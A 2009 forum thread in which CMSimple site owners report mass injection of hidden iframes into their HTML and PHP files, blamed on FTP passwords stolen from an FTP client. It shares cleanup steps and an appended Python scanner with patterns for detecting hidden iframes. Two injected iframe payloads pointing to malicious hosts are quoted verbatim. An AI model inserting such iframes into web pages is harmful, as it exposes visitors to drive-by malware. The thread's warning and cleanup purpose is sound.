WARNING!!!WARNING!!!WARNING!!!

Post by Tata » Wed Jun 17, 2009 2:29 pm

Yesterday I found that not only was my PC infected by about 50 Trojans, but also all webpages I have built were hacked. An IFRAME with a "display:hidden" attribute was inserted in almost all HTM and PHP files. Some hacker has found a way of stealing FTP passwords.
The code

<iframe src="h**p://jL.ch&#117;ra.pl/rc/" style="d&#105;splay:none"></iframe>
(**=tp) is mostly inserted just before the last "?>" or "<BODY>". Now I need to:
  1. Change all FTP passwords
  2. download and clear all websites - all possibly infectable files
  3. change all login-passwords
  4. upload them back
  5. stop using TotalCommander FTP client
If you experience the same problem and know how to make it easier, please let us know.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.

Re: WARNING!!!WARNING!!!WARNING!!!

Post by Connie » Wed Jun 17, 2009 5:27 pm

that's just plain sh..., I can imagine how angry you are now...

keep on!

Connie
|---
Connie Müller-Gödecke, http://www.webdeerns.de

Re: WARNING!!!WARNING!!!WARNING!!!

Post by Tata » Wed Jun 17, 2009 9:39 pm

That's far more than a s**t. I have found that almost every HTM, HTML, and PHP file (even some of the SYS files) got this insertion. There were over 5000!!! files infected on my PC in only a couple of minutes. Even during scanning, warnings about infected files occurred.
I have been working on it for over 6 hours already. :twisted: :twisted: :twisted: :twisted:

Re: WARNING!!!WARNING!!!WARNING!!!

Post by Holger » Thu Jun 18, 2009 6:46 am

Tata wrote: Some hacker has found a way of stealing FTP passwords
Hmm, are you sure?
Have you checked the server-ftp-logfiles?

Holger

Re: WARNING!!!WARNING!!!WARNING!!!

Post by Tata » Thu Jun 18, 2009 11:22 am

Holger wrote: Hmm, are you sure? Have you checked the server-ftp-logfiles?
Holger
That's what I have found on forums about this danger. And I have not yet studied the log files. I have been working on the reinstallation of my home and office PCs since yesterday :-(. I have read that the TotalCommander FTP client has (up to version 7.4x) some holes and poorly encrypted passwords. So the virus searches for the wcx_ftp.ini file. If found, it reads all logins saved in it and uses them to intrude and send them over to other computers. The page inserted in this hidden IFRAME seems to be full of Trojans.

Re: WARNING!!!WARNING!!!WARNING!!!

Post by CMSimple-Styles.com » Thu Jun 18, 2009 11:33 am

I can recommend PrevX Security; it is not well known, but in my opinion it is the best antivirus detection. Let it run on your PC; it may help.

Re: WARNING!!!WARNING!!!WARNING!!!

Post by Martin » Thu Jun 18, 2009 12:40 pm

That sounds mean, sounds like your local machine is infected with some variant of the file infector virus "virut". Perhaps you have better luck, but it would be hard to get rid of this one, because you could not trust any of your "exe" and "scr" files. Perhaps you find an easier solution, but probably you would have to reformat your disk and reinstall your OS (without any .exe or .scr file from your "old" system) and clean up all your .html, .php and .asp files (with an editor with no html-preview) and change all your banking, email ... passwords.

I really hope you do not have to go through this long story of work and loss!

Martin

Re: WARNING!!!WARNING!!!WARNING!!!

Post by Tata » Thu Jun 18, 2009 7:27 pm

Actually, it is 21:25 right now and I have succeeded in entirely reformatting one of my 2 infected PCs and I am starting from "0" now. I cannot imagine how much time I will spend on downloading/cleaning/uploading all the websites I have access to. Brrrrrrrrrrrrrrr

Re: WARNING!!!WARNING!!!WARNING!!!

Post by gerepeer » Sat Jul 11, 2009 1:15 am

Hello,

Last night I saw that 2 of my sites were down and went to take a look. It seems that someone found out my passwords, found a way into CMSimple, or I did not have the rights set right, but I found out that in every folder every index.php or index.html file was changed and an iframe was added.

<iframe src="http://a5h.ru:8080/ts/in.cgi?pepsi97" width=125 height=125 style="visibility: hidden"></iframe>

I was not able to find out what this was meant to lead to, but maybe someone who speaks/reads Russian is able to tell me what they intended.
Fortunately I have some backups, but if it turns out that hackers have found a way in, then the community should start to worry.
Hope it's just me and I will have to study chmod rights again.

Gerepeer

Re: WARNING!!!WARNING!!!WARNING!!!

Post by Tata » Sat Jul 11, 2009 7:08 am

Well, there is nothing in Russian. But I have found in some forum what this is about. The hacker has written a script that reads the file containing your TotalCommander FTP passwords. They are obviously poorly encrypted. Then it puts this hidden IFRAME into any index.php, index.htm (in my case also into any HTM) file, not only in your websites but also on your local PC. The visitor is then invisibly redirected to a page from which it loads a bunch of Trojans. The only way to solve this horror is (at least I must do it):
  1. download all websites to our HDD
  2. with Notepad++ or PSPad search for the IFRAME code and Replace it by an empty line
  3. Upload everything back
  4. Delete all passwords from FTP Client
There is still the danger, that your PC is full of Trojans rewriting any EXE. But this is another story. Maybe there are already some removers on the net. But there weren't any 3 weeks ago and I needed to re-install my entire PC.
In this case:
  1. Make an exact copy of all important files on a removable drive.
  2. reformat your infected partitions
  3. install your OS
  4. install your antivirus
  5. install PSPad
  6. search for the IFRAME code and Replace it to an empty line in any file on your removable drive - if you find there any.
I am sorry for you. But enjoy the least creative work on PC. :(

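The "search for the IFRAME code" step in the cleanup lists above can be scripted instead of done by hand in an editor. The following is an added example, not code from the thread or from CMSimple: a Python scanner that reports hidden iframes in .htm/.html/.php files, decoding HTML entities first so an entity-obfuscated style attribute is still caught. All function names and the sample hosts are constructed for illustration.

```python
import html
import re
from pathlib import Path

# iframe opening tag (plus a directly following close tag) and the hiding styles.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>(?:\s*</iframe\s*>)?", re.IGNORECASE)
HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
EXTENSIONS = {".htm", ".html", ".php"}


def is_hidden(raw_tag):
    # Decode entities such as &#105; first, so "d&#105;splay:none" still matches.
    return bool(HIDDEN_RE.search(html.unescape(raw_tag)))


def find_hidden_iframes(text):
    """Return (line_number, src) for every hidden iframe found in text."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        if is_hidden(m.group(0)):
            src = SRC_RE.search(html.unescape(m.group(0)))
            line = text.count("\n", 0, m.start()) + 1
            hits.append((line, src.group(1) if src else ""))
    return hits


def strip_hidden_iframes(text):
    """Remove hidden iframes only; visible iframes are left untouched."""
    return IFRAME_RE.sub(lambda m: "" if is_hidden(m.group(0)) else m.group(0), text)


def scan_tree(root):
    """Map each .htm/.html/.php file under root to its hidden-iframe hits."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            hits = find_hidden_iframes(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report

# Constructed sample: a PHP page with one injected and one legitimate iframe.
SAMPLE = (
    "<?php echo $content;\n"
    '<iframe src="http://bad.example.invalid/rc/" style="d&#105;splay:none"></iframe>\n'
    "?>\n"
    '<iframe src="https://maps.example.invalid/" width="400"></iframe>\n'
)
```

Run `scan_tree()` over the downloaded copy of a site and review the hits before applying `strip_hidden_iframes()`, since a site may also hide iframes on purpose.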